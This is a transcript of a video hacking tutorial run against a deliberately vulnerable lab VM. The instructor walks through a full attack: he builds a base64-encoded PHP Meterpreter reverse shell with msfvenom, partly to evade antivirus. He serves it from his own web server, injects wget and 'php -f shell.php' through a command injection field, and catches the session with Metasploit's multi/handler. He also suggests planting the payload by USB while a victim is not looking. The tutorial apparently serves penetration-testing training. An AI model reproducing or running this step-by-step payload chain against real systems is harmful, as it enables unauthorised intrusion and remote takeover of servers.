[00:00:00] Hello everybody and welcome back. Let us actually get started with some of our first exploitations. So what you want to do is open up your msfconsole, first of all. Next thing that you want to do is basically let us actually open up our OWASP virtual machine as well. So for me it is already up and running. If it is not for you, you want to open it. And let's go open up our Firefox for a moment.

[00:00:27] Now what we will be doing in this tutorial is basically I will show you how you can get the meterpreter shell back with the command injection attack that we already covered before. So you should be already familiar with that. You remember when we pinged that website and we actually managed to connect the target machine back to us? Now we will be doing the same thing, just right now we will be getting the meterpreter shell back. I will also show you how to do the same thing with the PHP injection vulnerability. Now we didn't cover PHP code injection, but it is simple, and it is almost the same as the other injections that we did before. So it is just injecting a certain type of code and injecting it into a browser that isn't very well filtered. So the user input is also read as code.

[00:01:20] So let us first of all go to the OWASP virtual machine. So it is 192.168.1.2. It will open up our standard OWASP virtual machine welcome page, where we have all of our stuff that we need. And where we want to go, let me see, we want to go to the bWAPP right here. Now the login is the same as before, so bee and then bug right here in order to login. Press enter, and you are logged into this. Now since I already removed my burpsuite proxy preferences before, you will want to turn it on once again. So let me just go right here. So we will use burpsuite as well with the mixture of metasploit, and with the mixture of the OWASP virtual machine. So just scroll down. Let me go here on the settings and set my manual proxy configuration. Now I removed all of these boxing configurations which are basically used for burpsuite. Please make sure to set them once again and click here. OK, and we will be good to go.

[00:02:38] But right now you will notice that if I reload the page I will not be able to connect to it. That is because we are not running the burpsuite. So open up another terminal, type burpsuite, press enter, and let us open our proxy. So we will be able to inspect packets right here, and we will be sending some of the other stuff into the website, such as our meterpreter shell, and such as some of the other commands. So let us just click OK right here, and while this is opening let us actually check out the page that we will be attacking. Oh, yeah, I forgot, we need to wait for the burpsuite to open. So click here next, then start, for us to start the burpsuite. Oops, we do not want to cancel. So click here, no. And we will wait for this to open, and then we will go to the page of the PHP code injection. And then after that, we will go to the command code injection. First of all, let's go to the command code injection since that is something that you're familiar with, and probably will understand it easier.

[00:03:49] So before we do any of that, just go to the proxy intercept and turn the intercept off so we can load the pages properly. Now when we go to the page and we reload it once again, we successfully connect to it. And here what you want to choose is the OS command injection. As I said before, we should already be familiar with this. So just click on hack right here. We didn't really cover the OS command injection from this page, we covered it from the other page, but it is the same principle. So in the previous attack that we did, a command injection, you can remember that we actually pinged the website. And right here we are performing the DNS lookup. So let's see what happens when we just run this with the default server right here. We can see server and then this IP address, so this is basically the router, and then we have some of the other options as well. So the IP address at the end is this one, it doesn't even matter. So what matters for us is what happens if we run that. And then after that we also specify ls, which is the command to list all of the directories and files in that sub directory. So we click here ls, and just as simple as that we can now see that this website is vulnerable to the command injection. It should actually specify... It also specified all of the files that it has in that directory on the eats machine, which it shouldn't be specifying.

[00:05:23] So now that we know that, what we want to do next is basically we want to make a meterpreter shell that is basically running over PHP. Now why over PHP? As we can see right here all these files are .PHP, and we can actually upload the shell on this web server, and run it, and make the web server connect to our virtual machine. So let us do that by starting off with creating the meterpreter PHP shell. So this is where we introduce, for the first time, the MSF venom tool, which we will use in order to create the meterpreter shell. So let's start off with that first. We can actually leave this. I said leave it and then closed it. It doesn't even matter. So we need to leave this and let's open a new terminal. Make it larger and then zoom in so you can see this better. We will use a simple syntax for the MSF venom.

[00:06:36] What we want to do right here is this, so follow me. msfvenom, and then after that, basically, if you want to you can just type --help. I believe it will print the available options, but let's not bother with this at the moment. Just follow with what I'm typing and I will explain while I'm going through it. So msfvenom... now the -p option will actually specify the payload that you will use. So we want to use PHP meterpreter and then reverse TCP. So php/meterpreter/reverse_tcp.

[00:07:15] Now in order for you to understand it better, let me actually open paint and I will draw a simple drawing of what our reverse TCP shell means. So we have our PC right here which is the attacker's PC. This is our good ole Kali Linux machine that's selected as "A" for the attacker. And here we have the victim machine which we are attacking. So we want to send the shell to the victim machine. This is in our case the OWASP virtual machine, which we will select with "V" as victim. So the problem with connecting, just simply connecting to the open port, is that this machine might have a firewall around it. Not might, basically all of the machines. All of the networks basically nowadays have firewalls, but what a firewall cannot prevent is the victim machine connecting back to us. Now how will we do that? So, first of all, the reason why the firewall won't prevent it is the same as, for example, imagine if I opened my virtual machine right here, Kali Linux, went to Firefox, and my firewall blocked me from going to Google.com. That is the firewall blocking the outgoing connections, which it most likely never does.

[00:08:44] So, let me just continue my drawing right here. What we want to do is we want to send the file to this machine right here. The file, so let's imagine "X" is that file and we sent it to the victim machine, and what that file will do is basically it will initiate the connection with us. So this file, when it is run on the victim machine, or when it is started up on the machine, it will try to connect to us. So the firewall won't be able to stop it since the victim machine itself tried to connect to us. And while it tries to connect to us we will be listening for the outgoing or incoming connections. And once this program is started it will connect back to us, and we will be able to communicate with this machine and execute commands in it, and so on and so on.

[00:09:38] But you might be asking, how are we going to get that file on the victim machine? Well, that is simple. If the victim machine is vulnerable to the PHP code injection or to the OS command injection, we will be able to execute it just by making the machine download it with command injection. But if, for example, the machine isn't vulnerable to anything, which we will cover in the later videos when the machine doesn't have any vulnerability, the only way for the victim to download that file is if it clicks on the download button and if it runs it itself. We will not be able to run the file for the victim itself. Or, there is another way. If the victim is physically close to you, you can actually take your USB drive, transfer the file onto the USB drive, and transfer it to the victim machine while they are not looking, or something like that, and then run the file. And basically you just did all of this process by yourself, just being physically on their laptop or on their PC. So, I hope you understood this. So, the basic idea behind this is that the victim is trying to connect back to us with our malware program, or with our PHP meterpreter shell.

[00:11:00] So let us continue now with actually making this. Now the name of that shell is meterpreter. We will use it with PHP and we use the reverse TCP connection. Now there are some of the other options as well but we will use these ones for now. Now after you specify all of this, the next thing we want to specify is the local host IP address. Now what is the local host IP address? That is the IP address of the host that's listening. Which in this case, the host that is listening is you. So you as attacker are the listening host. So, what we need to specify right here after the LHOST, then equals and then the IP address. So let me just check what the IP address is from this machine. So ifconfig... it is .1.7, okay. And then we specify 192.168.1.7. And after that we need to specify the out port as well, and that is the port that you are listening on. It is also your port. So, by default Metasploit is set on the 4444 port, so we will just keep with that. So just 4444, select that, and after that you can select some of the other options that are actually optional.

[00:12:18] So, we will select that so I can just show you. For example, let's use the encoder. Now the encoder... I covered what an encoder is in the previous video. So basically it's used to most likely bypass anti viruses, which actually we do not need in this case but I will show you how you can use it. So the encoder will scramble the code, we will not be able to see the code itself in raw format. We will be seeing scrambled, encrypted code. So the encoder that I will use is php/base64. What else we want to specify at the end is -f, and then file to be raw, and after that we want to specify the arrow and just save that into reverseshell.php. Let us actually name it shell.php, there is no need for that long name. Once we select all of this and once we double check all of the options that we set, you can click here enter, and this will take a few seconds to finish. It will be around 1000 bytes large, or 1100 bytes, something like that, if I remember correctly. So, OK. Now because of the encoder it is a little bit larger. So, our meterpreter PHP shell is now 1506 bytes large. If you press here ls, you'll be able to see it is right here. So this is our shell.php, this is our malware, and this is our program that we will be sending to the victim machine. We created it with this command.

[00:14:09] Now there are a few things that you need to do when you make the PHP reverse shell. First of all, you need to add the PHP tag, since it doesn't come with that. So, this is the scrambled code. This is basically B64 encoded code as we can see right here. This is the function that is used to decode the base64. We can see this doesn't look anywhere close to the programming language but that is why we use the encoder, so it doesn't get detected by antivirus on legit websites. So, what we want to do is add the PHP tag. So, first of all, up here we want to add this tag, and then a question mark and then PHP. So that is the opening tag, and at the end we want to add the question mark and then the closing tag. You need to add this in order for the program or for the machine to recognize this as the PHP code. So, ctrl + O to save, ctrl + X to exit. And now we are good to go.

[00:15:13] The only thing we need to do right now is set this file or program somewhere where it can be downloaded from. Now that place would be the Apache 2 web server. So you want to send this to your Apache web server. So let us go to var/www/html, which is the location of all the programs that are available on your Apache 2 web server, and just type here ls. Let me delete the previous files that we used in the previous tutorials, and remove the index.html. And what I want to do is copy, or actually move, root/shell.php, or basically whatever path to your shell.php is, and move it to var/www/html. And we can see that right now we have this shell.php right here. If we cat it we can see that this is the PHP shell that we'll be sending to the OWASP virtual machine. We added the PHP tags, closed the PHP tags, and this is the encoded page code. So, right now the next thing we want to do is make sure that Apache 2 is running. So service apache2 status. We can see that it is active and running. And right now what we want to do is go to our IP address, which is 192.168.1.7, I believe, and we can see that right here we have available online the shell.php file.

[00:16:52] Now what we want to do, we want to make that victim PC actually download this file. So how do we do that? Since it is vulnerable to the command injection, what you want to do is basically let me just show you right here. What you want to do is use a simple tool that is on all Linux systems, which is called wget. Now wget is basically used to download the file. So let me show you how that looks on our Linux machine. So let me just close this since we do not need it. And let's actually go to root and mkdir test, and go to test. Here we do not have anything. But if we run this command wget, and then we run 192.168.1.7 and we need to specify what we are downloading. So we need to specify the /shell.php since that is the name of our file that is located in the www/html folder. We press here enter and this will download the file for us. As we can see it downloaded shell.php just with this simple one command. So if I type here ls once again, we can see that the shell.php is in our folder. If we cat it you can see... oops. No idea why it doesn't actually contain something. It could be because of that problem with my Apache 2 web server.

[00:18:28] So what I will do is I will host this real quick on my laptop. So I will create a save file. Just give me one second and then it should work. So, just one second. So I created the file on my laptop, and it should take a few seconds to finish, and I will download the file from there. Now you can continue downloading it from your own Apache 2 web server since the problem is only with mine. I don't have any idea why it doesn't work, but on all the other Kali Linux machines it basically does work. But for some reason here it will not work. So let me just add the PHP tags to my shell on my laptop. So what I want to add is this, and ?php, and then ? and the close tag. And now if we visit the laptop we should have the same file. So we changed this IP address to the IP address of my laptop, and here we have the same shell.php. So let's actually try to now wget 192.168.1.15. And here it downloaded a file. Woops. Why is it called index.html? I have no idea. OK, so we didn't specify of course the file itself. What we need to specify is wget 192.168.1.15/shell.php, so it actually downloads the correct file. So now if we cat it we can see that we get the entire file right here. Now this was only the problem with the Apache 2 from my Kali Linux web server. So don't mind this, you should be good to go. And let us continue with the attack.

[00:20:27] So right now what we want to do is perform the command injection. So we know that there is a vulnerable input right here, and let's actually exploit it right now. So we can just delete this and then type here ls, once again, to see if it still works. We will get all of the files in the current directory since it is vulnerable. And let us right now type the same command. So wget 192.168.1.15/shell.php. We saw that it works in our Kali Linux machine, so let's perform this right here. As we can see it performed it without any error. And right now if we type here ls once again, let's actually try to find if right now it successfully downloaded the shell.php. So it should be somewhere around s, so let me just find... here it is, shell.php, and we successfully got the shell.php file on our target machine with a simple command. And we didn't have to make anyone click on anything, or we didn't have to make basically any physical contact with that machine.

[00:21:42] Now in order for you to execute this file you will need to type a certain command. But before we type that command, we need to start listening on a certain port. So let us open our msfconsole so we can continue with this attack. Right now before we execute the shell.php on the victim, we want to start our listener in our Metasploit framework. So this is opening. What you want to use right here is something called exploit multi/handler. So this is something that you will use a lot. Just type here use exploit/multi/handler. If you show options, you can see that there are no options right here. So what you want to do is set the payload, set payload php/meterpreter/reverse_tcp. Why did it stop? It got stuck. OK, so here it is, reverse_tcp. Show options once again, and we can see that we get the whole LHOST to listen on. Now double check the port we specified in that command while we were making shell.php, that the LPORT is 4444, and the LHOST is the IP address of our own machine. So we listen to our own connection. So set LHOST 192.168.1.7. Let me just check if that is really my IP address. OK, so it is. And all I need to do is type here exploit right now, and this will wait for an incoming connection.

[00:23:33] So right now we are waiting for someone to run that program on the target machine. But since nobody will really do it, we have to do it ourselves. And we can do it since that server is vulnerable to the command injection. So just type ; and then what we want to do is basically php -f and then shell.php. This command right here will run the PHP file. And we can see if I press here Lookup, we get a meterpreter session 1 opened. We can see right here that it is on a connection from our OWASP virtual machine, or basically this is a connection from our OWASP virtual machine, whose IP address is 1.2, and the IP address of this is our Kali Linux machine. So we successfully got meterpreter open. Now we can check that it really is that machine. If I go right here on ifconfig, and type it once again, you can see that it truly is the 192.168.1.2.

[00:24:40] Now that will be about it for this tutorial. We will cover the other exploits as well, and we will also show what we can do with a meterpreter session open. So what can we execute, what post exploitation tools can we use, and so on and so on. So that's about it for now. I hope I see you in the next tutorial and take care. Bye!